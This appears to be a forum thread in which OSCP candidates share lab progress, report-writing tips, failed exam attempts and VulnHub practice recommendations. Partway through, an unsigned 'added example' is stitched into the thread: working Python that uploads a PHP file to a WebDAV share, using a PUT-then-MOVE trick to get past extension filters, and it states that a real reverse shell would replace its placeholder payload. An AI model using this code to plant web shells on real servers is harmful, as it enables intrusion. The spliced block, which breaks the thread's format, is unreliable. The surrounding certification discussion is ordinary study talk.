OSCP (starting 13/12/2015)
Comments
-
Sheiko37:
I just managed to get that working, but without needing to make any changes to the SSH port; trying to run dirb on it now.
-
Sheiko37:
I finally managed to hack a device in the Admin Network (JIM-DESKTOP); it was all about pivoting and port forwarding, complicated and dry.
I went to an admin when I was stuck on it and he gave me a canned response about drawing my port forwarding with a pencil and paper and going back to the network diagram in the manual... the second time I've been given that answer. It turned out I just had a single-character typo. Why would he send me down the rabbit hole of doubting everything I was doing with port forwarding when it was correct? Did he even read my question?
I have four days of lab access left and I'm spending it collecting screenshots for my lab report and exercises in the manual. The final list: ALICE, BOB, BOB2, ORACLE, ORACLE2, PEDRO, PHOENIX, KRAKEN, MIKE, REDHAT, FREEBSD, MAILMAN, JEFF, UBUNTU7, SHERLOCK, IT-JOE, SRV2, THINCMAIL, KEVIN-PC, RALPH, COREHTTP, SIPSERVER, OTRS, FC4, FC42, HELPDESK, TIMECLOCKDEV, NIKY, JIM-DESKTOP, and BILL (low privilege).
-
Sheiko37:
No extension. I'll do my lab report and have an attempt at the exam. If I fail then I'll re-evaluate and look at getting more lab time.
-
Sheiko37:
I'm getting through the lab report, but it's a mess. Their template has you sort everything by vulnerability, not by IP, so when it comes to privilege escalation vulnerabilities I'm writing as though it's just assumed you have low privilege access on the system; otherwise you'll be repeating yourself constantly or referencing exploits from pages back.
e.g. anonymous FTP is a low severity vulnerability, and I've written a report on that affecting a few systems. Then many pages later I might have a linux-sendpage privilege escalation... well, do you mention you copied it across via anonymous FTP, or is it not relevant since the explanation of this vulnerability assumes you have low privilege access?
Having said that, in the real world it would be much easier to action the solutions in a report when ordered this way.
-
Sheiko37:
I have the exam booked for this coming Tuesday.
I'm getting through the lab report; thought I'd post some details of my method that others may find helpful. https://web.nvd.nist.gov is good to take your severity from, and http://www.securityfocus.com/ is good for vulnerability fixes (under the solution tab), and either of these sites, or rapid7.com, cve.mitre.org, and cvedetails.com, are all good to take your vulnerability explanation from. I haven't been re-wording these much, I see no benefit from re-writing it in your own words, though some explanations need to be made relevant to the lab device.
-
Sch1sm:
I wasn't really planning on submitting the entire lab report like that; I assumed people just uploaded their notes from KeepNote/whatever. Can anyone else who's submitted their report chime in?
-
Sheiko37:
https://support.offensive-security.com/#!oscp-exam-guide.md
> Documentation Requirements: (Optional) Lab Report
> You are highly encouraged to submit a penetration test report, including exercises, for the lab environment. A lab report has the potential to provide you with bonus points if you are close to passing the exam.
> If further clarification is necessary, you can also provide any KeepNote files that contain your rough notes. Please note that your KeepNote files are not a substitute for the lab or exam report.
-
Jebjeb:
You do not upload your KeepNote files! They can actually deduct points for not following their (or any) report format. I did not do a lab report, but did attach the proof texts and machine names, IPs, and status as a table in an appendix.
-
Sheiko37:
Well, I'm done; exam failed. I don't know if I have the energy to submit a mostly empty report tomorrow. Right now I honestly regret ever signing up for this course.
-
invictus_123:
> Well, I'm done; exam failed. I don't know if I have the energy to submit a mostly empty report tomorrow. Right now I honestly regret ever signing up for this course.
What happened, mate?
-
griffondg:
I feel your pain, as I failed a week ago too. Time crunch got to me and I never even bothered to submit a report since I knew there was 0% chance I would pass. Looking at it with a clear head afterwards, I see some obvious things I missed. Keep at it and give it a try once you figure out what to do differently. I'm taking the exam again in a few weeks.
Good luck!
Eric
-
Sheiko37:
The exploit fix took about 3.5 hours; lots of problems, but it eventually worked.
I got root on one other machine. I got the low privilege shell through a web application that was surprisingly hard to even find, then escalated privileges with Mempodipper, which only worked after using a command to break out of a "jail" shell, which to be honest was a complete fluke.
I got a low privilege shell with Metasploit on one machine, and spent maybe another 8 hours total on that one without being able to escalate. I tried a dozen local root exploits. There was nothing out of the ordinary running as root, no applications or services that drew much attention; I spent hours on them all though, hours on sudoedit privilege escalation that went nowhere.
The other two: on one of them I found nothing, I could not even find a hint of any low privilege access, traversal, etc., absolutely nothing. On the other one, worth 10 points, I found three separate applications, all with multiple exploits, but none worked. I went over every exploit in existence for all those applications many times.
-
Sheiko37:
Their exam re-take policy is so stupid. If you wanted to take the exam in, say, a month from now and book two weeks of lab access leading up to it, it can't be done. If you buy more lab access it starts now; there is no option to schedule it in the future. You might say, why not just wait a few weeks and then book the lab time? If you do that, all the exam spots will be taken in the schedule; there is no way to look at exam availability until after you've paid them.
-
ilikeshells:
The exam is challenging. It is extremely frustrating at times. I know, I retook it 3x. My only advice is to think about how you can be more efficient in enumerating and knowing when to move on. Good luck!
-
Sheiko37:
Here's some advice for prospective students: book your exam a few weeks before the end of your lab time. If you fail you can just get back in the labs and buy another exam ticket. If you do your lab report as you go then you'll have it ready in time for the exam.
-
Sheiko37:
It's been a while since an update. I'm finishing up my second exam attempt; I came in a fair bit more prepared and it's gone significantly worse.
-
chrisone:
Keep at it, Sheiko! Looks like many people try 3-5 times to pass. Do not let frustration stop you from moving forward.
Certs: CISSP, EnCE, OSCP, CRTP, eCTHPv2, eCPPT, eCIR, LFCS, CEH, SPLK-1002, SC-200, SC-300, AZ-900, AZ-500, VHL:Advanced+
2023 Cert Goals: SC-100, eCPTX
-
Sch1sm:
I just got destroyed in the exam this week too. I got most of the machines in the lab but had no idea what to do with the exam machines. Not really sure where to go from here; I could buy more lab time, but I can't really see how that would significantly improve my chances of passing.
-
griffondg:
Count me in the multiple fails category. Just finished the exam for the 2nd time this morning, and while I did better than last time I still fell short. I spent about the last 8 hours on one system trying to escalate privileges, which would have given me enough. Oh well, two more weeks and I'll be back at it!
-
towentum:
I haven't sat the exam yet, but I have read several reviews and pentesting methodologies. The number one killer I see is the failure to fully enumerate. I understand exploits will fail on occasion, but it's a case of measure twice and cut once. The act of owning the box and escalating privileges should account for less than 10% of the time spent on the box (statistic I made up just now). Multiple people have told me, in and out of the industry, that you should only fire off your exploit when you're certain it will work.
I'm not sure what your methods are, but a friendly tip is to enumerate until you feel like you are best friends with that box. Until you know its deepest, darkest secrets!
-
Sheiko37:
I've been told twice a day for the last four months that enumeration is important - I get it.
I've scheduled my third attempt for the 12th of June; that's the earliest I could get, it books out way in advance.
In the meantime I've done seven machines from VulnHub; can't recommend it enough. I reckon I've learned more in a week on VulnHub machines than I have in a month in the OSCP labs. I'm going to keep doing VulnHub machines up until the exam, hopefully get through 30+.
-
Sch1sm:
I've been working through some VulnHub ones as well. It helps immensely to have a walkthrough available, imo. If you're stuck on something you can just check it, learn from it, and then execute it. It saves the ridiculous frustration and obscure bullshit you get with the Offsec labs. Can you recommend any VulnHub machines?
-
Sheiko37:
This is what I've seen mentioned in OSCP reviews and been recommended by current students.
Damn Vulnerable Web Application
Kevgir
Kioptrix Level 1
Kioptrix Level 1.1
Kioptrix Level 1.2
Kioptrix Level 1.3
Kioptrix 2014
Lord Of The Root 1.0.1
Pegasus
SickOs 1.1
Tr0ll 1
Tr0ll 2
Kioptrix Level 1 is probably too easy, level 3 was not so great. Tr0ll 1 and SickOs 1.1 are both great. Haven't done the rest yet.
There are some others that I haven't seen recommended anywhere, but I just quickly skim a walkthrough and see if it looks interesting. Droopy v0.2 was great; SecTalks Minotaur and Simple both look interesting but I haven't tried them yet. SickOs 1.2 is the newest one and overall isn't that great, though I learned some curl one-liners for a PHP reverse shell via WebDAV.
Edit: Apparently there's a wordfilter on T-r-0-l-l.
-
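The post above mentions uploading a PHP reverse shell over WebDAV with curl one-liners. The script below is an added example, not code from the thread or from any of the VMs named: it does the same exchange from Python's standard library, with the check a practitioner wants, namely trying a direct PUT of the .php file first and, when the server filters executable extensions, PUTting the content as .txt and MOVEing it into place (the curl equivalents are `curl -T shell.php URL` and `curl -X MOVE -H 'Destination: URL' URL.txt`). The WebDAV path, the in-process test server and the harmless placeholder payload are all constructed here; a real reverse shell would be substituted for `PLACEHOLDER_PHP`.

```python
"""Upload a file to a WebDAV share with a plain HTTP PUT, falling back to
PUT-as-.txt followed by MOVE when the server refuses .php uploads.
Added example: the share path, the local fake server and the payload
are constructed for the demonstration."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed stand-in for the real payload; the PUT/MOVE technique does
# not depend on the content.
PLACEHOLDER_PHP = b"<?php echo 'webdav put ok'; ?>"
OK_PUT = (200, 201, 204)   # success codes seen for PUT (create or overwrite)
OK_MOVE = (201, 204)       # success codes seen for MOVE


def dav_request(host, port, method, path, body=None, headers=None):
    """Send one WebDAV/HTTP request and return the status code."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request(method, path, body=body, headers=headers or {})
        return conn.getresponse().status
    finally:
        conn.close()


def upload_php(host, port, dav_dir, name, content):
    """Try a direct PUT of name.php; if the server rejects it (typically a
    403/405/415 filter on executable extensions), PUT it as name.txt and
    MOVE it into place, which misconfigured shares often still allow.
    Returns the method that worked, or None."""
    php_path = "%s/%s.php" % (dav_dir, name)
    if dav_request(host, port, "PUT", php_path, content) in OK_PUT:
        return "PUT"
    txt_path = "%s/%s.txt" % (dav_dir, name)
    if dav_request(host, port, "PUT", txt_path, content) not in OK_PUT:
        return None
    dest = "http://%s:%d%s" % (host, port, php_path)
    if dav_request(host, port, "MOVE", txt_path,
                   headers={"Destination": dest}) in OK_MOVE:
        return "MOVE"
    return None


class FakeDavHandler(BaseHTTPRequestHandler):
    """Constructed WebDAV server: refuses direct .php PUTs but honours MOVE,
    the misconfiguration the fallback is written for."""
    store = {}

    def log_message(self, *args):  # keep the demo quiet
        pass

    def do_PUT(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if self.path.endswith(".php"):
            self.send_response(403)
        else:
            self.store[self.path] = body
            self.send_response(201)
        self.end_headers()

    def do_MOVE(self):
        # Destination is an absolute URL; keep only its path component.
        dest = self.headers.get("Destination", "")
        dest_path = "/" + dest.split("//", 1)[-1].split("/", 1)[-1]
        if self.path in self.store:
            self.store[dest_path] = self.store.pop(self.path)
            self.send_response(201)
        else:
            self.send_response(404)
        self.end_headers()


def start_fake_dav():
    """Run the constructed server on an ephemeral localhost port."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), FakeDavHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def demo():
    """Upload the placeholder against the fake share; returns (method used,
    bytes now stored at /webdav/shell.php)."""
    srv = start_fake_dav()
    try:
        host, port = srv.server_address
        how = upload_php(host, port, "/webdav", "shell", PLACEHOLDER_PHP)
        return how, FakeDavHandler.store.get("/webdav/shell.php")
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())
```

Against a real share, check the PUT status codes it actually returns before trusting `OK_PUT`; some servers answer 200 on overwrite and 201 on create, and a 405 on MOVE means the method is disabled and the fallback will not help.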
griffondg:
Thanks for the tips on the VulnHub servers. Will spend the next couple of weeks on those before I retake the exam.
-
osc:
Hi Sheiko, I also regret signing up for the course, because the course material is so basic and now I have to keep paying to extend lab time until I get lucky and discover the right techniques I'm paying to learn. I wouldn't mind if they at least gave a complete list of topics to research, so it's not blind luck until you stumble on the right thing.
Let's be study buddies; I think we could save a lot of time and learn a lot more by working together. I've owned about 20 lab boxes and have attempted the exam too.
-
Sheiko37:
A small update. I've gone through 16 boxes from vulnhub.com. I've been looking for ones that I think would be relevant to the OSCP, but they're getting harder to find. I've learned a lot from the VMs on the site, but I'm no more confident for the next exam. In general I think the VulnHub VMs are easier, i.e. if something looks vulnerable it probably is, whereas with the OSCP I remember trying a lot of entry points that all ended up being protected/disabled/not working.
I've managed to re-schedule the exam for the 4th of June. If you keep checking the exam schedule occasionally a slot will open, if you're lucky.
I've also noticed in their FAQ update they now explicitly state the points you get for submitting a lab report and exercises from the coursework; it's 5 points each - https://support.offensive-security.com/#!pwk-reporting.md. The only guesswork left is how much they score low privilege shells in the exam; they only say less than half the full mark.
-
!nf0s3cure:
Well, good post. Considering your experience, I think I will try to get SANS 560 or similar first and then attempt it. Not sure if anyone can make a recommendation on whether 560 will help at all?
-
Sheiko37:
If I were to start over I would buy 30 days of access to do all the course material and document everything (for the 5 points), then step back and spend a few months on VulnHub and other VM penetration testing sites, whilst reading a good book on penetration testing, then come back and buy 60 days of lab access for the OSCP. The experience would be vastly different.